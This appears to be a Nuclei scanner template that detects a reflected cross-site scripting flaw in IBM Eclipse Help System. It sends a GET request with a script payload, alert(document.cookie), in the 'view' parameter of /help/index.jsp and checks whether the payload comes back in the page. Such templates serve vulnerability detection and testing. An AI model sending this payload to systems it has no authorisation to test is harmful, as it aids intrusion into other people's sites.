id: eclipse-help-system-xss

info:
  name: IBM Eclipse Help System - Cross-Site Scripting
  author: pikpikcu
  severity: high
  description: IBM Eclipse Help System 6.1.0 through 6.1.0.6, 6.1.5 through 6.1.5.3, 7.0 through 7.0.0.2, and 8.0 prior to 8.0.0.1 contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site.
  reference: https://packetstormsecurity.com/files/131924/IBM-Eclipse-Help-System-IEHS-Cross-Site-Scripting.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    max-request: 1
  tags: ibm,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "<script>alert(document.cookie)</script>"
        part: body

      - type: word
        words:
          - "text/html"
        part: header

# digest: 4b0a00483046022100a5b2477d7dd43d6bac8cc4075cf4f61a42809a1f5c5cbf5b02339cbfa0079d12022100ba50fc0ec5f2a5d24c17d084f265ce687bffb70e165196ebbb44ed11ebc0efde:922c64590222798bb761d5b6d8e72950
